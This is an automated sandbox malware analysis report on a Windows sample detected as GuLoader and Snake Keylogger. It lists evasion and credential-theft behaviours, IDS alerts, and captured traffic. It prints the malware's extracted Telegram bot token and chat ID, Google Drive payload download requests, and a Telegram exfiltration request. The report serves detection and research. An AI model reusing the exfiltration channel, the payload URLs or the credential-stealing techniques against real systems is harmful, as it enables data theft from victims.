Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OeM750ajqm.exe

Overview

General Information

Sample name:OeM750ajqm.exe
renamed because original name is a hash value
Original sample name:d8dd9ac3ec0436e700aa87ac846c7d682389acbbda1818b56c42bec2e21ece73.exe
Analysis ID:1631812
MD5:a348c76d9e0d8e41a5be07235738c114
SHA1:e7647f2f0f0bbd73dd3d6e024810f41c6c24a9fc
SHA256:d8dd9ac3ec0436e700aa87ac846c7d682389acbbda1818b56c42bec2e21ece73
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • OeM750ajqm.exe (PID: 1204 cmdline: "C:\Users\user\Desktop\OeM750ajqm.exe" MD5: A348C76D9E0D8E41A5BE07235738C114)
    • OeM750ajqm.exe (PID: 4940 cmdline: "C:\Users\user\Desktop\OeM750ajqm.exe" MD5: A348C76D9E0D8E41A5BE07235738C114)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7850428832:AAHkmxGiQMqPdI63Wmec7SES132JcWja6Js", "Chat_id": "7902102156", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2555642675.0000000036C81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.1450395666.000000000731A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: OeM750ajqm.exe PID: 4940JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:15:46.397617+010028033053Unknown Traffic192.168.2.449724104.21.80.1443TCP
            2025-03-07T16:15:49.803561+010028033053Unknown Traffic192.168.2.449726104.21.80.1443TCP
            2025-03-07T16:15:56.697503+010028033053Unknown Traffic192.168.2.449730104.21.80.1443TCP
            2025-03-07T16:16:00.187837+010028033053Unknown Traffic192.168.2.449732104.21.80.1443TCP
            2025-03-07T16:16:06.746218+010028033053Unknown Traffic192.168.2.449736104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:15:39.972761+010028032742Potentially Bad Traffic192.168.2.449722193.122.6.16880TCP
            2025-03-07T16:15:43.410275+010028032742Potentially Bad Traffic192.168.2.449722193.122.6.16880TCP
            2025-03-07T16:15:47.160324+010028032742Potentially Bad Traffic192.168.2.449725193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:15:32.774570+010028032702Potentially Bad Traffic192.168.2.449720142.250.185.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:16:14.293486+010018100071Potentially Bad Traffic192.168.2.449739149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000004.00000002.2555642675.0000000036C81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7850428832:AAHkmxGiQMqPdI63Wmec7SES132JcWja6Js", "Chat_id": "7902102156", "Version": "4.4"}
            Multi AV Scanner detection for submitted file
            Source: OeM750ajqm.exeVirustotal: Detection: 58%Perma Link
            Source: OeM750ajqm.exeReversingLabs: Detection: 39%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F87A8 CryptUnprotectData,4_2_065F87A8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F8EF1 CryptUnprotectData,4_2_065F8EF1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F87D1 CryptUnprotectData,4_2_065F87D1
            Source: OeM750ajqm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49723 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49730 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49732 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: OeM750ajqm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_00406751 FindFirstFileA,FindClose,3_2_00406751
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405B80
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_004027CF FindFirstFileA,3_2_004027CF
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_00406751 FindFirstFileA,FindClose,4_2_00406751
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_004027CF FindFirstFileA,4_2_004027CF
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405B80
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0652F45Dh4_2_0652F2C0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0652F45Dh4_2_0652F4AC
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0652FC19h4_2_0652F961
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F7EB5h4_2_065F7B78
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F25A9h4_2_065F2300
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F9280h4_2_065F8FB0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FA3AFh4_2_065FA0E0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F1CF9h4_2_065F1A50
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F4D21h4_2_065F4A78
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F7119h4_2_065F6E70
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FF13Fh4_2_065FEE70
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F6CC1h4_2_065F6A18
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FACCFh4_2_065FAA00
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F48C9h4_2_065F4620
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F5179h4_2_065F4ED0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F7571h4_2_065F72C8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FB15Fh4_2_065FAE90
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FD14Fh4_2_065FCE80
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F2151h4_2_065F1EA8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F2A01h4_2_065F2758
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FD5DFh4_2_065FD310
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FF5CFh4_2_065FF300
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F55D1h4_2_065F5328
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F79C9h4_2_065F7720
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FB5EFh4_2_065FB320
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F5E81h4_2_065F5BD8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F9A8Fh4_2_065F97C0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FFA5Fh4_2_065FF790
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F5A29h4_2_065F5780
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F2E59h4_2_065F2BB0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FBA7Fh4_2_065FB7B0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FDA6Fh4_2_065FD7A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F9F1Fh4_2_065F9C50
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F02E9h4_2_065F0040
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FBF0Fh4_2_065FBC40
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F3709h4_2_065F3460
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F32B1h4_2_065F3008
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F62D9h4_2_065F6030
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FDEFFh4_2_065FDC30
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FC39Fh4_2_065FC0D0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FE38Fh4_2_065FE0C0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F0B99h4_2_065F08F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F0741h4_2_065F0498
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F6733h4_2_065F6488
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FE81Fh4_2_065FE550
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F0FF1h4_2_065F0D48
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FA83Fh4_2_065FA570
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FC82Fh4_2_065FC560
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F18A1h4_2_065F15F8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FCCBFh4_2_065FC9F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065FECAFh4_2_065FE9E0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 065F1449h4_2_065F11A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06633E27h4_2_06633B58
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06634E18h4_2_06634B20
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06637458h4_2_06637160
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06631E37h4_2_06631B68
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06639F60h4_2_06639C68
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663CA68h4_2_0663C770
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 066347E8h4_2_06634478
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06635C70h4_2_06635978
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663F570h4_2_0663F278
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 066302E7h4_2_06630040
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06636138h4_2_06635E40
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663FA38h4_2_0663F740
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06631517h4_2_06631248
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06638C40h4_2_06638948
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663B748h4_2_0663B450
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663E250h4_2_0663DF58
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663E718h4_2_0663E420
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06630BF7h4_2_06630928
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06637920h4_2_06637628
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663A428h4_2_0663A130
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06633507h4_2_06633238
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663CF30h4_2_0663CC38
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663D3F8h4_2_0663D100
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06636600h4_2_06636308
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06639108h4_2_06638E10
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06632BE7h4_2_06632918
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663BC10h4_2_0663B918
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663C0D8h4_2_0663BDE0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 066342B7h4_2_06633FE8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 066352E0h4_2_06634FE8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663EBE1h4_2_0663E8E8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06637DE8h4_2_06637AF0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 066322C7h4_2_06631FF8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663A8F0h4_2_0663A5F8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663ADB8h4_2_0663AAC0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06633997h4_2_066336C8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663D8C0h4_2_0663D5C8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06636AC8h4_2_066367D0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 066319A7h4_2_066316D8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 066395D0h4_2_066392D8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06639A98h4_2_066397A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06633078h4_2_06632DA8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663C5A0h4_2_0663C2A8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 066357A8h4_2_066354B0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663F0A8h4_2_0663EDB0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06631087h4_2_06630DB8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 066382B0h4_2_06637FB8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06638778h4_2_06638480
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06632757h4_2_06632488
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663B280h4_2_0663AF88
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 0663DD88h4_2_0663DA90
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06630767h4_2_06630498
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then jmp 06636F90h4_2_06636C98
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_0665F228
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_0665F218

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49739 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:15:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49725 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49722 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49720 -> 142.250.185.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49724 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.80.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49723 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49730 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49732 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
